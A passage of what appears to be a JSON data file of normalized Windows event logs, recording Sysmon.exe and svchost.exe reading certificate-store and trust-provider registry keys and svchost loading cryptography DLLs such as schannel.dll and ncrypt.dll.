"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" 
- }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "schannel.dll", - "image_path": "C:\\Windows\\System32\\schannel.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mskeyprotect.dll", - "image_path": "C:\\Windows\\System32\\mskeyprotect.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": 
"svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", - "registry_value": "ROOT", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", - "registry_value": "ROOT", - "timestamp": 131883570904340000, - "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot", - "registry_value": "AuthRoot", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot", - "registry_value": "SmartCardRoot", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - 
"timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883570904340000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
